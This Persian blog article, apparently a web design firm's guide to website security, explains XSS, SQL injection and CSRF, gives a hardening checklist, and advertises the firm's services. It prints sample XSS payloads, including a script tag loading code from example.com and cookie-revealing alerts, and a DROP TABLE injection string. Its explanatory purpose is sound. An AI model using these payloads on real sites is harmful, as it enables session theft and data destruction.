امنیت سایت چیست؟
به کلیه اقداماتی که موجب ایجاد یک بستر مناسب برای رشد و بهبود امنیت یک سایت شود امنیت سایت گفته میشود. این اقدامات در چند بخش مختلف قرار میگیرند و هر کدام از بخشها به خودی خود اهمیت بسیار بالایی دارد توجه کنید که هر کدام از بخشها اگر دچار مشکل شود، امنیت بقیه بخشها را نیز به مخاطره خواهد انداخت ما در اینجا چند مورد از بخشهایی که باید امنیت بالایی داشته باشند تا سایت شما دچار مشکلات امنیتی نشود به ترتیب اعلام میکنیم:
-
امنیت هاست یا سرور: یکی از مواردی که بیشترین ضربات را ایجاد میکند ایمن نبود و امنیت پایین هاست یا سرور میتواند باشد و در صورت ایجاد رخنه تمام اطلاعات شما از بین خواهد رفت. توجه به این موضوع برای ادامه حیات و حفظ اعتبار سایت شما ضروری است.
-
امنیت دیتابیس: همه میدانیم که دیتابیس نیز سطوح امنیتی مختلفی دارد و باید با استفاده از رمز و پسورد قوی محافظت شود دقت کنید حتما دسترسی ریموت به دیتابیس را همیشه قفل کنید همچنین اجرای بعضی از دستورات که از نوع مخرب محسوب میشوند باید قطع شود.
-
امنیت cms، زبان یا فریمورک برنام نویسی: مرحله بعدی که باید دقیق مورد بررسی قرار بگیرد خود سایت شما است و نداشتن مطالعه در مورد نحوه حملات به آن و عدم اطلاع از رخنههای موجود در زبان بکار گرفته سایت میتواند ضررهای جبرانناپذیری ایجاد کند همیشه سعی کنید زبان، cms و یا فریمورک مورد استفاده را بهروزرسانی کنید. همچنین کدهای نوشته شده خود را از لحاظ اتک مهاجمان بررسی کنید گاهی مشکلات و باگها از سمت خود برنامهنویس هم می تواند ایجاد شود!
-
آموزش نیرو: گام بعدی که گزارشات متعددی از این بخش در شرکتهای مختلف به ما میرسد مشکل عدم رازداری و عدم دانش نیرو است که به راحتی اطلاعات حساس را در احتیار افراد دیگر قرار میدهند که موجب دسترسیهای غیرمجاز میشود حتما به نیروهای خود در این زمینه آموزشهای لازم را ارائه کنید
راه های افزایش امنیت سایت به صورت ساده
همیشه نیاز به متخصص بودن نیست برخی از راه های افزایش امنیت سایت به صورت ساده قابل انجام هست سعی کنید تمام موارد ساده ذیل را از شرکت مربوطه خود دریافت کنید:
- استفاده از CDN مناسب: مثل کلودفلر که جلوگیری می کند از حملات DDos و همیشه کپی وبسایت شما در سرورهای دیگر قرار دارد و و سرور اصلی برای هکر به راحتی قابل تشخیص نخواهد بود.
- انتخاب هاست و یا سرور با امنیت بالا: شما هرچقدر هم که وبسایت خوبی داشته باشید اما فضای میزبانی شما مثل هاست و سرور دارای امنیت خوبی نباشد همه زحمات خود را بر باد رفته بدانید شرکتهای هاستینگ باید امنیت را از سمت خود تضمین کنند و با ارتقا سخت افزارهای شبکه ای و نرمافزاری مثل فایروالها در صدد جلوگیری و ایجاد رخنه باشند توجه کنید بکاپ روزانه یکی از راههای بازگرداندن اطلاعات است و جزو اولین موارد حیاتی خود برای انتخاب هاست قرار بدید سعی کنید پیشینه هاستینگ، سرور و خدمات ابری مورد نظر رو بررسی کنید در شبکههای اجتماعی عموما سرویسهای ضعیف معرفی میگردن
- استفاده از نسخه پایدار زبان برنامه نویسی سایت: با گذشت زمان این یک مورد عادی است که در موارد قدیمی باگهایی کشف میشود و نیاز هست زبان مورد نظر ارتقا داده شود عموما در هاستها و سرورهای امروزه شما به راحتی میتوانید از نسخههای مختلف یک زبان استفاده کنید مثلا نسخه 5.6 php دارای باگهای بسیاری بوده و بهتر است شما از نسخه 8 به بالا استفاده کنید. (در تایم نگارش این مقاله نسخه 8 php آخرین نسخه منتشر شده بوده است)
- به روز رسانی cms وبسایت: بیشتر وب توسط cms وردپرس در حال سرویس دهی است و این cms همیشه نیازمند آپدیت شدن است اگر طراحی وبسایت وردپرس سفارش دادهاید حتما تاکید کنید که خود وردپرس آخرین نسخه و بر روی آخرین نسخه php قابل اجرا باشد همیشه به یاد داشته باشید در سایتهای وردپرسی بیشترین ضعف از سمت افزونه و قالب نال شده است چون هکرها از عدم آپدیت این موارد نهایت استفاده را میکنند.
- انتخاب فریم ورک مناسب: اگر جزو شرکتهایی هستید که ترجیح میدهید طراحی اختصاصی برای شما انجام شود بهتر است فریم ورک لاراول یا جنگو را انتخاب کنید این فریمورکها در بالاترین سطح امنیتی قرار دارند و قابلیت سرویسدهی برای انواع دستگاههای مختلف را با ایجاد توکنهای مختلف و غیرقابل رمزگشایی را دارند توجه کنید فریم ورک هم باید بهصورت زمانی آپدیت شود.
- تیم مناسب پشتیبانی: عموما طراحی سایت توسط یک فرد، شرکت یا مجموعه انجام میشود که یکی از وظایف تیم طراحی مورد پیادهسازی دقیق امنیت در کدنویسی یا cms است خدمات پشتیبانی سایت شامل مواردی مثل: بررسی امنیت از سمت خود سایت، بهروزرسانی فریم ورک یا cms استفاده شده و ... است
سفارش امنیت سایت
اگر تا به امروز مواردی برای ارتقا security سایت خود انجام ندادید حتما سعی کنید یک شرکتی که این خدمات را ارائه می کند را سریع ارتباط بگیرید برای سفارش امنیت سایت می توانید با کارشناسان جاب تیم ارتباط بگیرید.
معنی امنیت سایت
معنی امنیت در وبسایت یعنی هوشیاری در تمام جنبههای طراحی و استفاده از وبسایت. این مقاله شما را به یک متخصص امنیت وب سایت تبدیل نمیکند، اما به شما کمک میکند بفهمید که تهدیدات از کجا است و چه کاری میتوانید انجام دهید تا وبسایت خود را در برابر رایجترین حملات امنتر کنید.
تهدیدات امنیتی برای وب سایت
تهدیدات امنیتی یک الی دو مورد نیست و ما در زمان نگارش این مقاله مواردی که یافت کردهایم را برای شما مینویسیم حتما دقت کنید که در آینده امکان دارد مواردی به این لیست اضافه شود پس سعی کنید در زمینه تهدیدات سایت مطالعه مستمر داشته باشید.
امنیت سایت در برابر حملات xss
XSS اصطلاحی است که برای توصیف دستهای از حملات استفاده میشود که به مهاجم یا هکر اجازه میدهد تا اسکریپتهای سمت کلاینت را از طریق وبسایت به مرورگرهای سایر کاربران تزریق کند. از آنجایی که کد تزریق شده از سایت به مرورگر میآید، کد مورد اعتماد است و میتواند کارهایی مانند ارسال کوکی مجوز سایت کاربر برای مهاجم را انجام دهد. هنگامی که مهاجم کوکی را داشته باشد، میتواند وارد سایتی شود که انگار همان کاربر است و هر کاری که کاربر میتواند انجام دهد، مانند دسترسی به جزئیات کارت اعتباری، دیدن جزئیات تماس، یا تغییر رمز عبور.
نکته: بیشترین آسیب پذیری در وب از طریق حملات xss بوده است!
آسیبپذیریهای XSS بر اساس اینکه سایت چگونه اسکریپتهای تزریقشده را به مرورگر برمیگرداند، به دو دسته منعکس شده و پایدار تقسیم میشوند .
- یک آسیبپذیری بازتابشده XSS زمانی رخ میدهد که محتوای کاربر که به سرور ارسال میشود بلافاصله برگردانده شود و برای نمایش در مرورگر تغییر داده نشود. هر اسکریپت در محتوای اصلی کاربر هنگام بارگیری صفحه جدید اجرا میشود. به عنوان مثال، یک تابع جستجوی سایت را در نظر بگیرید که در آن عبارات جستجو به عنوان پارامترهای URL کدگذاری میشوند و این عبارات همراه با نتایج نمایش داده میشوند. یک مهاجم میتواند پیوند جستجویی بسازد که حاوی یک اسکریپت مخرب به عنوان یک پارامتر باشد و آن را برای کاربر دیگری ایمیل کنید. اگر کاربر هدف روی این "لینک جالب" کلیک کند، اسکریپت با نمایش نتایج جستجو اجرا میشود. همانطور که قبلاً بحث شد، این به مهاجم تمام اطلاعاتی را میدهد که برای ورود به سایت به عنوان کاربر هدف، بهطور بالقوه خرید به عنوان کاربر یا اشتراکگذاری اطلاعات تماس خود، نیاز دارند.
http://developer.mozilla.org?q=beer<script%20src="http://example.com/tricky.js"></script>
برخی از موارد از این حملات به ترتیب ذیل است:
{search_term_string}
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
<script>alert('Was Here!!')</Script>
<script>alert(document.cookie)</script>
Site.com/welcome.htm?name=<script>cod1</script>&name=<script>cod2</script>
- یک آسیبپذیری پایدار XSS زمانی رخ میدهد که اسکریپت مخرب در وبسایت ذخیره میشود و بعداً بدون تغییر برای سایر کاربران نمایش داده میشود تا ناخواسته اجرا شوند. به عنوان مثال، بخش نظرات صفحه که حاوی HTML اصلاح نشده است، می تواند یک اسکریپت مخرب از یک مهاجم را ذخیره کند. هنگامی که نظرات نمایش داده می شود، اسکریپت اجرا می شود و می تواند اطلاعات مورد نیاز برای دسترسی به حساب کاربر را برای مهاجم ارسال کند. این نوع حمله بسیار محبوب و قدرتمند است، زیرا مهاجم حتی ممکن است هیچ ارتباط مستقیمی با قربانیان نداشته باشد.
در حالی که درخواستهای POST یا GET رایجترین منبع آسیبپذیریهای XSS هستند، هر داده از مرورگر میتواند بهطور بالقوه آسیبپذیری ایجاد کند، مانند دادههای کوکی ارائهشده توسط مرورگر، یا فایلهای کاربر که آپلود و نمایش داده میشوند.
بهترین دفاع در برابر آسیب پذیری های XSS د حذف یا غیرفعال کردن هر نشانه گذاری است که به طور بالقوه می تواند حاوی دستورالعمل هایی برای اجرای کد باشد. برای HTML این شامل عناصری مانند <script>،،، <object>و <embed>.<link>
فرآیند اصلاح دادههای کاربر بهگونهای که نتوان از آن برای اجرای اسکریپتها استفاده کرد یا بر اجرای کد سرور تأثیر بگذارد، به عنوان پاکسازی ورودی (input sanitization) شناخته میشود. بسیاری از فریم ورکهای وب بهطور پیشفرض ورودی کاربر از فرمهای HTML را بهطور خودکار پاکسازی میکنند.
امنیت در برابر حملات SQL injection (تزریق کدهای sql)
آسیبپذیریهای SQL injection به هکران امکان میدهد تا کد SQL دلخواه را در پایگاه داده شما اجرا کنند و به دادهها اجازه دسترسی، اصلاح یا حذف بدون توجه به مجوزهای کاربر را میدهند. یک حمله injection موفق ممکن است کاربران را جعل و کاربرانی جدید ایجاد کند(هویت های جدیدی با سطح دسترسی مدیریت)، به همه داده های روی سرور دسترسی داشته باشد یا داده ها را از بین ببرد یا تغییر دهد تا غیرقابل استفاده شود.
انواع تزریق SQL شامل مبتنی بر خطا (Error-based SQL injection)، تزریق SQL بر اساس خطاهای بولی (boolean errors) و تزریق SQL مبتنی بر زمان (Time-based) است.
این آسیبپذیری وقتی ایجاد می شود که هکر ورودی دستوری ارسال کند که تغییر معنای ایجاد کند. به عنوان مثال، کد زیر برای فهرست کردن همه کاربران با یک نام خاص (userName) است که از یک فرم HTML ارسال می شود:
statement = "SELECT * FROM users WHERE name = '" + userName + "';"
دستور بالا مشخص می کند که کاربری وارد شده آیا در دیتابیس هست یا خیر که هکر میتواند رفتار این دستور SQL را به دستور جدید در مثال زیر تغییر دهد
SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';
دستور اصلاح شده یک دستور SQL معتبر ایجاد می کند که جدول users را حذف می کند و تمام داده ها را از userinfo جدول انتخاب می کند (که اطلاعات هر کاربر را نشان می دهد). این کار به این دلیل کار می کند که قسمت اول متن تزریق شده ( a';) عبارت اصلی را کامل می کند.
برای جلوگیری از این نوع حمله، باید اطمینان حاصل کنید که هر داده یا ورودی کاربر که به یک پرس و جوی SQL ارسال می شود، نمی تواند ماهیت پرس و جو را تغییر دهد. یکی از راه های انجام این کار محدود کردن کاراکترهای ورودی کاربر است که در SQL معنای خاصی دارند.
نکته: دستور SQL کاراکتر ' را به عنوان آغاز و پایان یک رشته تحت اللفظی در نظر می گیرد. با قرار دادن یک بک اسلش در مقابل این کاراکتر ( \' )، از نماد فرار می کنیم و به SQL می گوییم که در عوض آن را به عنوان یک کاراکتر (فقط بخشی از رشته) در نظر بگیرد.
در عبارت زیر کاراکتر ' خنثی می کنیم. SQL اکنون نام را به صورت کل رشته به صورت پررنگ تفسیر می کند (که در واقع یک نام بسیار عجیب است، اما مضر نیست).
SELECT * FROM users WHERE name = 'a\';DROP TABLE users; SELECT * FROM userinfo WHERE \'t\' = \'t';
امنیت در برابر حملات جعلی csrf
حملات CSRF به کاربر مخرب این امکان را می دهد که بدون اطلاع یا رضایت کاربر، اقداماتی را با استفاده از اعتبار کاربری دیگر انجام دهد.
این نوع حمله به بهترین شکل با مثال توضیح داده می شود. آروان یک کاربر مخرب است که میداند یک سایت خاص به کاربرانی که وارد شدهاند اجازه میدهد با استفاده از یک درخواست POST که شامل نام حساب و مقداری پول است، پول را به یک حساب مشخص ارسال کنند. آروان فرمی می سازد که شامل اطلاعات بانکی و مقداری پول به عنوان فیلدهای مخفی است و آن را برای سایر کاربران سایت ایمیل می کند (با دکمه ارسال که به عنوان پیوندی به یک سایت "سریع پولدار شوید").
اگر کاربر روی دکمه ارسال کلیک کند، یک درخواست POST حاوی جزئیات تراکنش و هر کوکی سمت کلاینت که مرورگر با سایت مرتبط است به سرور ارسال میشود (افزودن کوکیهای سایت مرتبط به درخواستها رفتار عادی مرورگر است). سرور کوکیها را بررسی میکند و از آنها برای تعیین اینکه آیا کاربر وارد شده است و اجازه انجام تراکنش را دارد یا خیر، استفاده میکند.
نتیجه این است که هر کاربری که هنگام ورود به سایت معاملاتی روی دکمه ارسال کلیک کند، معامله را انجام می دهد. آروان پولدار میشه!
نکته: ترفند اینجاست که آروان نیازی به دسترسی به کوکیهای کاربر (یا دسترسی به اعتبار) ندارد. مرورگر کاربر این اطلاعات را ذخیره میکند و بهطور خودکار آن را در تمام درخواستهای سرور مرتبط گنجانده است.
یکی از راههای جلوگیری از این نوع حمله این است که درخواستهای POST شامل یک توکن ایجاد شده توسط کاربر خاص باشد. توکن هنگام ارسال فرم وب مورد استفاده برای انتقال، توسط سرور ارائه می شود. این رویکرد آروان را از ایجاد فرم خود باز می دارد، زیرا او باید توکنی را که سرور برای کاربر فراهم می کند بداند. حتی اگر او توکن را کشف کند و یک فرم برای یک کاربر خاص ایجاد کند، دیگر نمی تواند از همان فرم برای حمله به هر کاربر استفاده کند.
فریم ورک های وب اغلب شامل چنین مکانیسم های پیشگیری از CSRF می شوند.
چک لیست بررسی امنیت سایت
برای ایجاد امنیت سمت سایت باید مواردی همیشه چک شود تا از حملات هکرها تا حد زیادی جلوگیری کنید یا حداقل اگر هک شدید آبرومندانه باشد! در ذیل یک چک لیست کامل سعی کرده ایم ارائه کنیم:
- ایجاد محدودیت لاگین برای آی پی: برای بخش های مهم سایت مثل لاگین ادمین حتما محدودیت آی پی ایجاد کنید در این روش مدیر باید از یک آی پی ثابت برای لاگین استفاده کند که هکر در مرحله اول دسترسی به صفحه لاگین را ندارد و محدودیت های چند مرحله ای را تجربه خواهد کرد.
- استفاده از کپچا: کپچا کمک می کند که ربات تشخیص داده شود و خیلی از حملات و راه های یافتن نفوذ در سایت شما برای هکر زمانبر شود به عبارتی ایجاد فرسودگی کند.
- استفاده از توکن csrf: توکن csrf یک کد رمزگذاری شده است که فقط روی سایت شما معتبره و در درخواست هایی به صورت post ارسال می شود و از حملات وسیع جلوگیری می کند.
- استفاده از گواهی ssl معتبر: گواهی ssl اجازه انتقال سایت شما از http به https است که یک فایل رمزنگاری شده روی سرور با کلیدهای دسترسی عمومی و خصوصی می باشد که به سایت شما هویت می بخشد. امروزه داشتن این مورد برای تمام سایت اجباری است و مرورگرها سایتهای بدون https را بعنوان اسپم به کاربر اطلاع می دهند و از بازدید سایت مورد نظر توسط کاربر جلوگیری می کنند.
- تغییر مسیر لاگین مدیریت: آدرس های پیش فرض ورود و ثبت نام را همیشه تغییر دهید و حتما از معرفی این آدرس ها در نقشه سایت جلوگیری کنید همیشه به یاد داشته باشید موتورها جستجو می توانند این موارد را کشف کنند برای همین این صفحات را حتما نوایندکس و از دادن هر نوع لینک داخلی در سایت به این صفحات جلوگیری کنید.
- رمز عبور قدرتمند: چه مدیریت و چه کاربران عادی را حتما مجبور به تولید پسورد قوی کنید پسوردهای عادی مثل 123456 و ... بیشترین پسوردهای حال حاضر استفاده شده توسط افراد هستند و همیشه پیش فرض ربات ها برای چک کردن قرار می گیرند برای همین احتمال هک سایت را بسیار بالا می برند. (رمز عبور و پسورد و اهمیت حفاظت از آن)
- تغییر دوره ای رمز عبور: همیشه در نظر داشته باشید که امکان دارد اطلاعات حساس مثل پسورد را در کنار دوستان خود بازگو کنید و روزی همین دوستان شما دشمنان آینده شوند! برای همین پسورد های دسترسی خود به تمام بخش ها را به صورت دوره ای تغییر دهید.
- تعیین سطوح دسترسی (ACL): سطوح دسترسی برای هر بخشی مرحله دوم خواهد بود که کمک میکند هکر دردسر بیشتری را حس کند با سطوح دسترسی برای هر بخش مثل: امکان نمایش تکی، لیست، حذف، ویرایش و ... محدودیتهایی خیلی زیادتری ایجاد میکنید و از حذف و سرقت اطلاعات تا حد زیادی میتوانید جلوگیری کنید.
- به روز رسانی پلاگین های امنیتی: اشاره کردیم بیشتر سایت ها با وردپرس و دیگر cms ها پیاده سازی شده است و این cms ها دارای پلاگین های مختلفی برای ایجاد امنیت هستند که باید نصب و به روز رسانی گردند دقت کنید نصب افزونه ها باید با دلیل و منطق انجام شود چرا که خود این افزونه ها می توانند کمک به ایجاد راه های رخنه و هک سایت شوند.
- پیاده سازی عملیات حذف نرم: سالهاست که برنامه نویس های حرفه ای دیگر به صورت واقعی حذف نمی کنند و اصطلاحا عملیات حذف نرم را انجام می دهند یعنی اطلاعات در دیتابیس می ماند ولی از دید پنل مدیریت مخفی می شود این کار کمک میکند بعد از اعمال خرابکارانه هکرها امکان بازگردانی دیتا ها وجود داشته باشد
- بکاپ دائم و روزانه: بکاپ گیری دائم عموما توسط خود شرکت هاستینگ انجام می شود ولی محض احتیاط همیشه یک نسخه جدید از آخرین اطلاعات هاست رو در هر 10 روز یکبار دانلود و در جایی امن ذخیره کنید.
- امنیت فایل های پیکربندی: نسبت به زبان مورد استفاده برای طراحی سایت بهتر است فایل های پیکربندی در سایت را در حالت امنیتی قرار دهید دقت کنید این موارد عموما توسط هاستینگ انجام می شود مثال از فایل پیکربندی در زبان php برای وب سرویس آپاچی فایل htaccess است.
- تغییر پورت های پیش فرض: پورت 80 در وب همیشه در دسترس عموم قرار دارد برای افزایش سطح امنیت بهتر است برای برخی از بخش ها مثل دسترسی ssh شماره پورت را تغییر دهید.
- تست دوره ای امنیت سایت: همیشه سعی کنید هر ماه یکبار امنیت سایت را با استفاده از ابزارهای مختلف بررسی کنید تا ساده ترین موارد امنیتی را رعایت و به سادگی مورد هجوم هکرها قرار نگیرید
- استفاده از cdn: حتما برای جلوگیری از حملات DDos قبل از اعتماد به هاستینگ خودتون دست به کار شده و cdn مناسب برای سایت خود تهیه کنید.
ابزارهای تست آنلاین امنیت سایت
ابزارهای مختلفی برای تست امنیت سایت می توانید در اینترنت یافت کنید در کل نگران این مورد نباشید که مواردی از امنیت شما امکان دارد افشا شود و هر باگی که می بینید را سریع برطرف کنید. این لیست کمک می کند تا با برخی از این ابزارهای آشنایی پیدا کنید
- سایت sitecheck.sucuri.net
- سایت ssllabs.com/ssltest
- سایت quttera.com
- سایت siteguarding.com
مطالعه بیشتر در مورد امنیت وردپرس که یک cms پر استفاده در فضای وب می باشد.
خدمات جاب تیم برای بررسی امنیت وب سایت
ما در مجموعه جاب تیم این امکان را برای مشتریان عزیزمان ایجاد کرده ایم که بتوانند از سرویس های ما برای امنیت سایت خود استفاده کنند برای سفارش بررسی وب سایت خود می توانید از طریق تماس مستقیم یا واتساپ اقدام کنید.
بررسی امنیت سایت با مرورگر کروم
برای اطلاع از امنیت یک سایت میتوانید اطلاعات امنیتی سایت را بررسی کنید. اگر نتوانید بهصورت ایمن و خصوصی از سایت مورد نظر بازدید کنید، مرورگر Chrome به شما هشدار خواهد داد.
- یک صفحه جدید در مرورگر کروم باز کنید
- برای بررسی امنیت سایت، در سمت راست آدرس بار (در زبان انگلیسی سمت چپ)، نماد وضعیت امنیت را بررسی کنید:
- ایمن
- اطلاعات یا ناامن
- ناامن یا خطرناک
- برای دیدن خلاصهای از جزئیات حریم خصوصی سایت و اجازهها، روی گزینه قفل کلیک کنید.
اهمیت امنیت سایت در چیست؟
در دنیای امروز امنیت سایتها اهمیت فوقالعاده زیادی دارند. شاید بتوان گفت مهمترین و موثرترین عاملی که میتواند باعث ادامه فعالیت سایتها شود امنیت آنها است. با این وجود با بررسیهایی که نسبت به وضعیت سایتهای مختلف انجام دادهایم، متوجه شدهایم که بسیاری از افراد نسبت به سایتی که دارند بیاهمیت هستند و امنیت آن را نادیده میگیرند. شاید یک سایت کوچک و کم طرفدار باشد اما امنیت آن برای ادامه فعالیت در مسیر، اهمیت بسیار زیادی دارد.
شاید در ظاهر امنیت سایت اهمیتی نداشته باشد اما زمانی این این موضوع اهمیت پیدا خواهد کرد که سایت تحت حمله قرار بگیرد.
زمانی که سایتی مورد حمله قرار بگیرد دو اتفاق رخ خواهد داد. یکی این است که حمله افراد ناموفق بوده و سایت آسیبی نخواهد دید اما در مقابل احتمال اینکه امنیت site رعایت نشده باشد و مورد آسیب قرار بگیرد بسیار زیاد است.
از آنجایی که security اهمیت زیادی دارد، لازم است که برای مقابله با تمامی انواع روشهای هک و آسیبها روشهایی را انتخاب و آنها را بر روی سایت پیادهسازی کنید. چرا که روشهای هک یا حملات امروزه متفاوت و بسیار گسترده هستند.
چگونه بررسی کنیم که یک سایت ایمن است یا نه؟
در بسیاری از مواقع مشکوک هستیم که آیا سایت ما ایمن بوده یا دچار مشکل امنیتی شده است. در این صورت شما میتوانید از روشهایی که وجود دارد بررسیهای لازم را انجام دهید و مطمئن شوید که سایت شما ایمن است یا نه.
از جمله روشهایی که به شما کمک خواهد کرد تا تشخیص دهید که یک وبسایت ایمن است میتوان به روشهایی چون تغییر مسیرها، هرزنامه، اسکن کد منبع، جاوا اسکریپت و ... اشاره داشت.
هر یک از این راهها جز روشهای معتبری هستند که شما را برای شناسایی هرگونه ویروسی در سایت کمک خواهند کرد. یکی از سریعترین روشهایی که برای بدافزاری سایت نیز وجود دارد و شما میتوانید با سرعت بیشتر و در زمان کمتر به راحتی مشکل را پیدا کنید اسکن سریع بدافزار URL است.
چرا کسبوکارها باید بر روی امنیت سایبری سرمایهگذاری کنند؟
دلایل مختلفی وجود دارد که کسبوکارها باید بر روی امنیت سایتهای خود سرمایهگذاری کنند اما از مهمترین دلایلی که در این حوزه وجود دارد، میتوان به چهار دلیل اصلی زیر اشاره داشت:
-
صاحبان سایت مسئول امنیت سایت هستند
لازم است بدانید که ارائهدهندگان هاست فقط از سروری که بر روی وبسایت شما ایجاد کردهاند محافظت میکنند آن ها هیچ نوع وظیفهای نسبت به تمامی بخشهای وب سایت شما ندارند
امنیت هر بخش از سایت به عهده کسی بوده اما در کل تمام سایت برای صاحب سایت است. بههمینجهت شما صاحبان سایت مسئول امنیت سایت هستید و باید برای ایجاد امنیت در سایت خود تلاش نمایید و از روشهای مختلف استفاده کنید. -
از حملات پرهزینه خودداری کنید
توجه داشته باشید که برای حملات هزینه زیادی را پرداخت نکنید چرا که برای کسبوکارهای کوچک وجود بالای هزینهها میتواند کار افتادگی هزینه داشته باشد و ضررهای زیادی را به کسبوکار وارد کند.
بسیاری از مشتریان بهطور متوسط در روز برای ایجاد طرح امنیتی کامل وبسایت مبلغی را پرداخت میکنند که این مبلغ نسبت به هزینههای حملات بسیار کم است. پس سعی کنید از حملات سایبری که پر هزینه هستند جلوگیری نمایید. -
از شهرت برند خود محافظت کنید
با کمی توجه در سایتهای مختلف متوجه خواهید شد که سایتهای مختلفی وجود دارند که با کوچکترین نقض اطلاعات دست از فعالیت خود کشیده و متوقف شدهاند. بههمینجهت بهتر است قبل از هر چیزی از شهرت خود محافظت نمایید و به بازدیدکنندگان توجه داشته باشید. که مشتریان و بازدیدکنندگان شما اهمیت زیادی برای شهرت شما و بزرگتر شدن کسبوکارتان دارد. -
فعالیتهای مخرب را شناسایی کنید
از زمانهای قدیم گفتهاند پیشگیری بهتر از درمان است. بههمینجهت لازم است بگوییم که شما بهتر است قبل از اینکه مشکل کوچک شما تبدیل به یک مشکل بزرگ شود آن را شناسایی کنید.
افرادی که جز مجرمان سایبری شناخته میشوند تخصص بسیار زیادی در کار خود دارند، بهطوری که میتوانند بهصورت پنهان وارد سایت شوند و تا مدتها بدون اینکه مالک چیزی بفهمد بر روی سایت فعالیت داشته باشند.
پس اگر شما در سایت خود مراقب نباشید، نمیتوانید حملات و بدافزاریها را تشخیص دهید. برخی از انواع حملات نیز هستند که نوعی بدافزار بوده که به شخص اجازه میدهند تا بدون اینکه مالک چیزی متوجه شود یا پیامی دریافت کند در سایت فعال باشند.
بنابراین به شما پیشنهاد میکنیم که با استفاده از روشهای بهروز سعی کنید این عوامل و فعالیتهای مخرب را شناسایی کنید. با شناسایی و پایان دادن به این نوع از حملات میتوانید در سایت خود امنیت زیادی را ایجاد کنید.
استفاده از کدام فریم ورک در امنیت سایت بیشتر موثر است؟
تمام فریمورک های امروزی بحث امنیت را با سطوح بالا رعایت کرده اند چند مورد رو نام میبرم لاراول، جنگو و asp core
سلام میشه در مورد HSTS توضیح بدید؟
HSTS یک هدر واکنشی است که به مرورگر اطلاع می دهد که وب سایت فقط از طریق HTTPS قابل دسترسی هستند.
این امر مرورگر شما را مجبور می کند تا فقط به نسخه HTTPS وب سایت و منابع موجود در آن دسترسی داشته باشد.
توجه داشته باشید که ممکن است با اینکه شما ssl را برای سایت فعال نموده باشید و ریدایرکت 301 به https را نیز تنظیم نموده باشید باز هم سایت همچنان با نسخه http دردسترس باشد.
با فعال کردن HSTS ، حملات پروتکل SSL و ربودن کوکی ، دو آسیب پذیری که در وب سایت های دارای SSL ممکن است رخ دهد، متوقف می شود. علاوه بر ایمن تر کردن وب سایت ، HSTS باعث بارگذاری سریعتر سایت نیز می شود.